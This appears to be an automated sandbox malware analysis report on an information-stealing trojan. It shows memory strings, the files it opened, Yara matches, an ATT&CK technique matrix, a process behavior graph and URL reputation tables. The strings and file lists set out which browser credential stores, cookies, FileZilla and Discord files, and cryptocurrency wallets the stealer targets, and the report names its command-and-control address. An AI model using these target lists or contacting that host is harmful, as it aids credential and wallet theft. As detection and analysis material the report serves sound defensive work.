                      Source: PO.exe, 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
                      Source: AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $]q2C:\Users\user\AppData\Roaming\Electrum\wallets\*
                      Source: PO.exe, 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                      Source: PO.exe, 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                      Source: AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\wallets
                      Source: PO.exe, 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                      Source: AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                      Source: AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $]q6C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeFile opened: C:\Users\user\AppData\Roaming\atomic\
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                      Source: Yara matchFile source: 7.2.PO.exe.3c18d70.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.PO.exe.3c00f50.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.PO.exe.3c18d70.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.PO.exe.3c00f50.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2160567285.0000000003C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: PO.exe PID: 7532, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: PO.exe PID: 8068, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: AJzHYZtQIb.exe PID: 8164, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: AJzHYZtQIb.exe PID: 5404, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 7.2.PO.exe.3c18d70.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.PO.exe.3c00f50.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.PO.exe.3c18d70.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.PO.exe.3c00f50.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.2357626482.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2276292357.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2160567285.0000000003C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: PO.exe PID: 7532, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: PO.exe PID: 8068, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: AJzHYZtQIb.exe PID: 8164, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: AJzHYZtQIb.exe PID: 5404, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      11
                      Disable or Modify Tools
                      1
                      OS Credential Dumping
                      1
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      1
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts2
                      Command and Scripting Interpreter
                      1
                      Scheduled Task/Job
                      111
                      Process Injection
                      1
                      Deobfuscate/Decode Files or Information
                      LSASS Memory3
                      File and Directory Discovery
                      Remote Desktop Protocol3
                      Data from Local System
                      11
                      Non-Standard Port
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Scheduled Task/Job
                      Logon Script (Windows)1
                      Scheduled Task/Job
                      4
                      Obfuscated Files or Information
                      Security Account Manager137
                      System Information Discovery
                      SMB/Windows Admin SharesData from Network Shared Drive2
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook13
                      Software Packing
                      NTDS1
                      Query Registry
                      Distributed Component Object ModelInput Capture12
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading
                      LSA Secrets351
                      Security Software Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Masquerading
                      Cached Domain Credentials1
                      Process Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items241
                      Virtualization/Sandbox Evasion
                      DCSync241
                      Virtualization/Sandbox Evasion
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                      Process Injection
                      Proc Filesystem1
                      Application Window Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1457840 Sample: w4XFffGDz1.exe Startdate: 15/06/2024 Architecture: WINDOWS Score: 100 53 api.ip.sb 2->53 71 Found malware configuration 2->71 73 Malicious sample detected (through community Yara rule) 2->73 75 Sigma detected: Scheduled temp file as task from temp location 2->75 77 10 other signatures 2->77 9 w4XFffGDz1.exe 10 2->9         started        12 AJzHYZtQIb.exe 2->12         started        signatures3 process4 file5 47 C:\Users\user\AppData\Local\Temp\...\PO.exe, PE32 9->47 dropped 15 PO.exe 6 9->15         started        83 Multi AV Scanner detection for dropped file 12->83 85 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 12->85 87 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 12->87 89 Injects a PE file into a foreign processes 12->89 19 AJzHYZtQIb.exe 12->19         started        21 schtasks.exe 12->21         started        signatures6 process7 file8 49 C:\Users\user\AppData\...\AJzHYZtQIb.exe, PE32 15->49 dropped 51 C:\Users\user\AppData\Local\...\tmp61B0.tmp, XML 15->51 dropped 57 Multi AV Scanner detection for dropped file 15->57 59 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 15->59 61 Machine Learning detection for dropped file 15->61 69 4 other signatures 15->69 23 PO.exe 14 49 15->23         started        27 powershell.exe 23 15->27         started        29 powershell.exe 23 15->29         started        31 schtasks.exe 1 15->31         started        63 Found many strings related to Crypto-Wallets (likely being stolen) 19->63 65 Tries to harvest and steal browser information (history, passwords, etc) 19->65 67 Tries to steal Crypto Currency Wallets 19->67 33 conhost.exe 19->33         started        35 conhost.exe 21->35         started        signatures9 process10 dnsIp11 55 45.137.22.67, 49710, 49718, 49720 ROOTLAYERNETNL Netherlands 23->55 79 Tries to steal Crypto Currency Wallets 23->79 37 conhost.exe 23->37         started        81 Loading BitLocker PowerShell Module 27->81 39 conhost.exe 27->39         started        41 WmiPrvSE.exe 27->41         started        43 conhost.exe 29->43         started        45 conhost.exe 31->45         started        signatures12 process13

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      w4XFffGDz1.exe68%ReversingLabsByteCode-MSIL.Trojan.SpyNoon
                      w4XFffGDz1.exe67%VirustotalBrowse
                      w4XFffGDz1.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe88%ReversingLabsByteCode-MSIL.Trojan.SpyNoon
                      C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe58%VirustotalBrowse
                      C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe88%ReversingLabsByteCode-MSIL.Trojan.SpyNoon
                      C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe58%VirustotalBrowse
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      api.ip.sb0%VirustotalBrowse
                      SourceDetectionScannerLabelLink
                      http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                      https://www.ecosia.org/newtab/0%URL Reputationsafe
                      https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                      http://45.137.22.67:556150%Avira URL Cloudsafe
                      https://ipinfo.io/ip%appdata%0%Avira URL Cloudsafe
                      https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                      https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                      http://45.137.22.67:55615/0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous0%Avira URL Cloudsafe
                      https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
                      https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                      http://45.137.22.67:55615/3%VirustotalBrowse
                      http://45.137.22.67:556153%VirustotalBrowse
                      http://schemas.datacontract.org/2004/07/0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/CheckConnectResponse0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX0%Avira URL Cloudsafe
                      https://ipinfo.io/ip%appdata%0%VirustotalBrowse
                      https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
                      http://schemas.datacontract.org/2004/07/0%VirustotalBrowse
                      http://tempuri.org/Endpoint/EnvironmentSettings0%Avira URL Cloudsafe
                      https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%Avira URL Cloudsafe
                      https://duckduckgo.com/ac/?q=0%VirustotalBrowse
                      https://api.ip.sb/geoip0%VirustotalBrowse
                      https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%VirustotalBrowse
                      http://tempuri.org/Endpoint/EnvironmentSettings2%VirustotalBrowse
                      https://api.ip.sb0%VirustotalBrowse
                      http://tempuri.org/Endpoint/CheckConnectResponse1%VirustotalBrowse
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous0%VirustotalBrowse
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX0%VirustotalBrowse
                      https://api.ip.sb/geoip0%Avira URL Cloudsafe
                      https://api.ip.sb0%Avira URL Cloudsafe
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/CheckConnect0%Avira URL Cloudsafe
                      http://www.w3.or0%Avira URL Cloudsafe
                      http://tempuri.org/0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/VerifyUpdateResponse0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/SetEnvironment0%Avira URL Cloudsafe
                      https://www.chiark.greenend.org.uk/~sgtatham/putty/00%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/SetEnvironmentResponse0%Avira URL Cloudsafe
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
                      http://tempuri.org/0%VirustotalBrowse
                      http://tempuri.org/Endpoint/VerifyUpdateResponse1%VirustotalBrowse
                      http://tempuri.org/Endpoint/GetUpdates0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/CheckConnect2%VirustotalBrowse
                      https://api.ipify.orgcookies//settinString.Removeg0%Avira URL Cloudsafe
                      https://www.chiark.greenend.org.uk/~sgtatham/putty/00%VirustotalBrowse
                      http://schemas.xmlsoap.org/ws/2004/08/addressing0%Avira URL Cloudsafe
                      45.137.22.67:556150%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/GetUpdatesResponse0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/EnvironmentSettingsResponse0%Avira URL Cloudsafe
                      45.137.22.67:556153%VirustotalBrowse
                      http://tempuri.org/Endpoint/VerifyUpdate0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/GetUpdates1%VirustotalBrowse
                      http://tempuri.org/Endpoint/GetUpdatesResponse1%VirustotalBrowse
                      http://tempuri.org/Endpoint/EnvironmentSettingsResponse1%VirustotalBrowse
                      http://schemas.xmlsoap.org/ws/2004/08/addressing0%VirustotalBrowse
                      http://tempuri.org/00%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/SetEnvironment1%VirustotalBrowse
                      http://45.137.22.67:55615t-0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/soap/actor/next0%Avira URL Cloudsafe
                      http://www.aforgenet.com/framework/0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/SetEnvironmentResponse1%VirustotalBrowse
                      http://tempuri.org/00%VirustotalBrowse
                      http://schemas.xmlsoap.org/soap/actor/next0%VirustotalBrowse
                      http://tempuri.org/Endpoint/VerifyUpdate1%VirustotalBrowse
                      http://www.aforgenet.com/framework/0%VirustotalBrowse
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      api.ip.sb
                      unknown
                      unknowntrueunknown
                      NameMaliciousAntivirus DetectionReputation
                      http://45.137.22.67:55615/true
                      • 3%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      45.137.22.67:55615true
                      • 3%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://ipinfo.io/ip%appdata%PO.exe, PO.exe, 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmptrue
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://45.137.22.67:55615PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, PO.exe, 0000000E.00000002.2276292357.000000000347E000.00000004.00000800.00020000.00000000.sdmp, PO.exe, 0000000E.00000002.2276292357.00000000033D8000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 3%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://duckduckgo.com/chrome_newtabtmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://duckduckgo.com/ac/?q=tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.google.com/images/branding/product/ico/googleg_lodp.icotmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousPO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FA1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Endpoint/CheckConnectResponsePO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.datacontract.org/2004/07/PO.exe, 0000000E.00000002.2276292357.00000000033D8000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/faultXPO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FA1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Endpoint/EnvironmentSettingsPO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, PO.exe, 0000000E.00000002.2276292357.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FF0000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 2%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://api.ip.sb/geoip%USERPEnvironmentROFILE%PO.exe, PO.exe, 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://api.ip.sbAJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FFA000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://api.ip.sb/geoipAJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FFA000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
